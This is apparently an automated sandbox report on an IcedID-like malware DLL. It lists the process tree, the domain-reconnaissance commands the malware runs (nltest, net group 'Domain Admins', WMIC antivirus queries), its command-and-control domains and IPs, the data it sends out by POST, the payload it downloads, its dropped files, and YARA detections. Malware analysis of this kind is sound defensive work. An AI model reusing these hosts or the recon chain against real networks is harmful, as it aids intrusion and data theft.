Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 19, 2021, 2:58 p.m.	March 19, 2021, 3 p.m.

Size	75.5KB
Type	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5	`334464d0b82e1d4a5de6669f0c98c055`
SHA256	`cc0a7db518659f54402561888b5bfc90205db9bdb296ed523e2e2567cd5d8be7`
CRC32	`FE33065E`
ssdeep	`768:KqE+MlI0GJ+4PWBzZMkkkksV83I8LtrqVLb/xXR+VYA8BjM20msXhwRnwP3LVx+I:nzMZCijuuK3Lqf4T/j6GAKg2gJFA`
Yara	PE_Header_Zero - PE File Signature Zero IsPE64 - (no description) IsDLL - (no description) IsWindowsGUI - (no description) HasDebugData - DebugData Check ImportTableIsBad - ImportTable Check HasRichSignature - Rich Signature Check

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\44273.4360444444.dat.dll,?uop@@YAHXZ
8024
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\44273.4360444444.dat.dll,?uop@@YAHXZ
  8780
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\44273.4360444444.dat.dll,DllRegisterServer
4864
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\44273.4360444444.dat.dll,DllRegisterServer
  4256
  - rundll32.exe rundll32.exe "C:\Users\test22\AppData\Local\Temp\mustx64.tmp",update /i:"DebateMixed\license.dat"
    2724
    - cmd.exe cmd.exe /c chcp >&2
      6948
      - chcp.com chcp
        7352
    - WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
      3716
    - ipconfig.exe ipconfig /all
      5264
    - systeminfo.exe systeminfo
      2456
    - net.exe net config workstation
      5520
      - net1.exe C:\Windows\system32\net1 config workstation
        3284
    - nltest.exe nltest /domain_trusts
      4464
    - nltest.exe nltest /domain_trusts /all_trusts
      8776
    - net.exe net view /all /domain
      5144
    - net.exe net view /all
      3408
    - net.exe net group "Domain Admins" /domain
      6220
      - net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
        1436
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\44273.4360444444.dat.dll,
7636

Name	Response	Post-Analysis Lookup
188criolaserz.space	A 178.128.243.14	178.128.243.14
aws.amazon.com	A 13.225.123.73 CNAME tp.8e49140c2-frontier.amazon.com CNAME dr49lng3n1n2s.cloudfront.net	13.225.123.73
ugolkuzjaspace.website	A 161.35.109.184	161.35.109.184
lissikopopo.fun	A 161.35.109.184	161.35.109.184

IP Address	Status	Action
13.225.123.73	Active	Moloch
161.35.109.184	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
178.128.243.14	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49816 -> 178.128.243.14:80	2030053	ET MALWARE Win32/IcedID Requesting Encoded Binary M4	Malware Command and Control Activity Detected
TCP 192.168.56.102:49813 -> 13.225.123.73:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49821 -> 161.35.109.184:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49822 -> 161.35.109.184:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 161.35.109.184:443 -> 192.168.56.102:49821	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49823 -> 161.35.109.184:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 161.35.109.184:443 -> 192.168.56.102:49822	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 161.35.109.184:443 -> 192.168.56.102:49823	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49829 -> 161.35.109.184:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 161.35.109.184:443 -> 192.168.56.102:49829	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49813 13.225.123.73:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=aws.amazon.com	f7:53:97:5e:76:1e:fb:f6:70:72:02:95:d5:9f:2f:05:52:79:5d:ae
TLSv1 192.168.56.102:49821 161.35.109.184:443	CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd	CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd	86:27:7b:7e:02:2a:7e:0d:d6:e7:73:43:e3:af:e0:5a:54:e2:ec:3e
TLSv1 192.168.56.102:49822 161.35.109.184:443	CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd	CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd	86:27:7b:7e:02:2a:7e:0d:d6:e7:73:43:e3:af:e0:5a:54:e2:ec:3e
TLSv1 192.168.56.102:49823 161.35.109.184:443	CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd	CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd	86:27:7b:7e:02:2a:7e:0d:d6:e7:73:43:e3:af:e0:5a:54:e2:ec:3e
TLSv1 192.168.56.102:49829 161.35.109.184:443	CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd	CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd	86:27:7b:7e:02:2a:7e:0d:d6:e7:73:43:e3:af:e0:5a:54:e2:ec:3e

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 19, 2021, 2:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 19, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 19, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 19, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 19, 2021, 2:51 p.m.			0	0
IsDebuggerPresent March 19, 2021, 2:51 p.m.			0	0
IsDebuggerPresent March 19, 2021, 2:51 p.m.			0	0
IsDebuggerPresent March 19, 2021, 2:59 p.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 19, 2021, 2:51 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 19, 2021, 2:59 p.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd6da49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7feff1673c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff2c43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7feff185295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7feff182799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7feff22af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7feff22b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7feff1848d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff3f0883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff3f0ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff3f0c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff2aa4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff2bd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff3f347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff3f122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff3f3542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff2bd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff2bd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x770d9bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x770d98da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff2bd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff3e3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff290106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff290182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefd6da49d registers.r14: 0 registers.r15: 0 registers.rcx: 49801216 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 49807168 registers.r11: 49802976 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1966431652 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

March 19, 2021, 2:59 p.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd6da49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7feff1673c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff2c43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7feff185295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7feff182799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7feff22af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7feff22b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7feff1848d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff3f0883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff3f0ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff3f0c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff2aa4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff2bd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff3f347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff3f122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff3f3542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff2bd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff2bd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x770d9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x770d98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff2bd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff3e3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff290106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff290182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd6da49d
registers.r14: 0
registers.r15: 0
registers.rcx: 49801216
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 49807168
registers.r11: 49802976
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1966431652
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://188criolaserz.space/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://aws.amazon.com/
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://lissikopopo.fun/news/1/255/0
suspicious_features	GET method with no useragent header	suspicious_request	GET https://lissikopopo.fun/news/18/255/0
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://lissikopopo.fun/news/4/2/0
suspicious_features	GET method with no useragent header	suspicious_request	GET https://lissikopopo.fun/sqlite64.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://ugolkuzjaspace.website/news/4/1/1
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://ugolkuzjaspace.website/news/8/0/1
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://ugolkuzjaspace.website/news/8/1/0
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://ugolkuzjaspace.website/news/4/3/1

Performs some HTTP requests (10 events)

request	GET http://188criolaserz.space/
request	GET https://aws.amazon.com/
request	POST https://lissikopopo.fun/news/1/255/0
request	GET https://lissikopopo.fun/news/18/255/0
request	POST https://lissikopopo.fun/news/4/2/0
request	GET https://lissikopopo.fun/sqlite64.dll
request	POST https://ugolkuzjaspace.website/news/4/1/1
request	POST https://ugolkuzjaspace.website/news/8/0/1
request	POST https://ugolkuzjaspace.website/news/8/1/0
request	POST https://ugolkuzjaspace.website/news/4/3/1

Sends data using the HTTP POST Method (6 events)

request	POST https://lissikopopo.fun/news/1/255/0
request	POST https://lissikopopo.fun/news/4/2/0
request	POST https://ugolkuzjaspace.website/news/4/1/1
request	POST https://ugolkuzjaspace.website/news/8/0/1
request	POST https://ugolkuzjaspace.website/news/8/1/0
request	POST https://ugolkuzjaspace.website/news/4/3/1

Allocates read-write-execute memory (usually to unpack itself) (6 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 19, 2021, 2:51 p.m.	process_identifier: 8780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000735bc000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 19, 2021, 2:51 p.m.	process_identifier: 4256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000735bc000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 19, 2021, 2:51 p.m.	process_identifier: 4256 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001c40000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 19, 2021, 2:51 p.m.	process_identifier: 2724 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000735bc000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 19, 2021, 2:51 p.m.	process_identifier: 2724 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001ea0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 19, 2021, 2:59 p.m.	process_identifier: 3716 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000745f3000 process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

rundll32.exe tried to sleep 298 seconds, actually delayed analysis time by 298 seconds

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\sqlite64.dll
file	C:\Users\test22\AppData\Roaming\{91705EE5-DFF4-903C-6CF9-EBE60A86BC6F}\eqpenu4.dll

Creates a suspicious process (2 events)

cmdline	cmd.exe /c chcp >&2
cmdline	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List

A process created a hidden window (10 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 8700 thread_handle: 0x0000000000000444 process_identifier: 6948 current_directory: filepath: track: 1 command_line: cmd.exe /c chcp >&2 filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 1596 thread_handle: 0x0000000000000444 process_identifier: 3716 current_directory: filepath: track: 1 command_line: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 5280 thread_handle: 0x0000000000000444 process_identifier: 5264 current_directory: filepath: track: 1 command_line: ipconfig /all filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 8116 thread_handle: 0x0000000000000444 process_identifier: 2456 current_directory: filepath: track: 1 command_line: systeminfo filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 2488 thread_handle: 0x0000000000000444 process_identifier: 5520 current_directory: filepath: track: 1 command_line: net config workstation filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 3612 thread_handle: 0x0000000000000444 process_identifier: 4464 current_directory: filepath: track: 1 command_line: nltest /domain_trusts filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 108 thread_handle: 0x0000000000000444 process_identifier: 8776 current_directory: filepath: track: 1 command_line: nltest /domain_trusts /all_trusts filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 9196 thread_handle: 0x0000000000000444 process_identifier: 5144 current_directory: filepath: track: 1 command_line: net view /all /domain filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 4308 thread_handle: 0x0000000000000444 process_identifier: 3408 current_directory: filepath: track: 1 command_line: net view /all filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1
CreateProcessInternalW March 19, 2021, 2:52 p.m.	thread_identifier: 8964 thread_handle: 0x0000000000000444 process_identifier: 6220 current_directory: filepath: track: 1 command_line: net group "Domain Admins" /domain filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000448	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 19, 2021, 2:59 p.m.	flags: 1158 family: 0	1	0	0

Potentially malicious URLs were found in the process memory dump (50 out of 255 events)

url	http://crl.comodo.net/TrustedCertificateServices.crl0
url	http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
url	http://crl.identrust.com/DSTROOTCAX3CRL.crl0
url	http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
url	http://cert.startcom.org/policy.pdf0
url	http://crl.securetrust.com/STCA.crl0
url	http://crl.securetrust.com/SGCA.crl0
url	http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url	http://www.ssc.lt/cps03
url	http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url	http://crt.comodoca.com/COMODORSAAddTrustCA.crt0
url	http://users.ocsp.d-trust.net03
url	http://crl.startcom.org/sfsca-crl.crl0
url	http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url	http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url	http://crl.comodo.net/AAACertificateServices.crl0
url	http://www.pkioverheid.nl/policies/root-policy0
url	http://cps.chambersign.org/cps/chambersroot.html0
url	http://www.disig.sk/ca/crl/ca_disig.crl0
url	http://www.entrust.net/CRL/Client1.crl0
url	http://crl.chambersign.org/publicnotaryroot.crl0
url	http://ocsp.comodoca.com0
url	http://logo.verisign.com/vslogo.gif0
url	https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url	http://www.crc.bg0
url	http://www.acabogacia.org/doc0
url	http://www.e-szigno.hu/SZSZ/0
url	http://crl.ssc.lt/root-b/cacrl.crl0
url	http://isrg.trustid.ocsp.identrust.com0
url	https://www.verisign.com/rpa0
url	http://www.quovadis.bm0
url	https://www.catcert.net/verarrel05
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url	http://crl.chambersign.org/chambersroot.crl0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url	http://crl.globalsign.net/root-r2.crl0
url	http://certificates.starfieldtech.com/repository/1604
url	http://www.d-trust.net0
url	https://www.catcert.net/verarrel
url	http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url	http://crl.ssc.lt/root-a/cacrl.crl0
url	http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url	http://www.certicamara.com/certicamaraca.crl0
url	http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url	http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url	http://www.post.trust.ie/reposit/cps.html0
url	http://www.d-trust.net/crl/d-trust_qualified_root_ca_1_2007_pn.crl0
url	http://www2.public-trust.com/crl/ct/ctroot.crl0
url	http://cert.startcom.org/sfsca-crl.crl0
url	http://www.certicamara.com0

Yara rule detected in process memory (50 out of 768 events)

description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over P2P network	rule	network_p2p_win
description	Communications over HTTP	rule	network_http
description	File downloader/dropper	rule	network_dropper
description	Communications over FTP	rule	network_ftp
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Communication using dga	rule	network_dga
description	Escalade priviledges	rule	escalate_priv
description	Take screenshot	rule	screenshot
description	Run a keylogger	rule	keylogger
description	Steal credential	rule	cred_local
description	Record Audio	rule	sniff_audio
description	APC queue tasks migration	rule	migrate_apc
description	Malware can spread east-west using share drive	rule	spreading_share
description	Create or check mutex	rule	win_mutex
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	Match Winsock 2 API library declaration	rule	Str_Win32_Winsock2_Library
description	Match Windows Inet API library declaration	rule	Str_Win32_Wininet_Library
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over P2P network	rule	network_p2p_win
description	Communications over HTTP	rule	network_http
description	File downloader/dropper	rule	network_dropper
description	Communications over FTP	rule	network_ftp
description	Communications over RAW socket	rule	network_tcp_socket

Terminates another process (20 events)

Time & API	Arguments	Return
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 6948 process_handle: 0x0000000000000448	0
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 6948 process_handle: 0x0000000000000448	-1073741558
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 3716 process_handle: 0x0000000000000448	0
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 3716 process_handle: 0x0000000000000448	-1073741558
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 5264 process_handle: 0x0000000000000448	0
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 5264 process_handle: 0x0000000000000448	-1073741558
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 2456 process_handle: 0x0000000000000448	0
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 2456 process_handle: 0x0000000000000448	-1073741558
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 5520 process_handle: 0x0000000000000448	0
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 5520 process_handle: 0x0000000000000448	-1073741558
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 4464 process_handle: 0x0000000000000448	0
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 4464 process_handle: 0x0000000000000448	-1073741558
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 8776 process_handle: 0x0000000000000448	0
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 8776 process_handle: 0x0000000000000448	-1073741558
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 5144 process_handle: 0x0000000000000448	0
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 5144 process_handle: 0x0000000000000448	-1073741558
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 3408 process_handle: 0x0000000000000448	0
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 3408 process_handle: 0x0000000000000448	-1073741558
NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 6220 process_handle: 0x0000000000000448	0
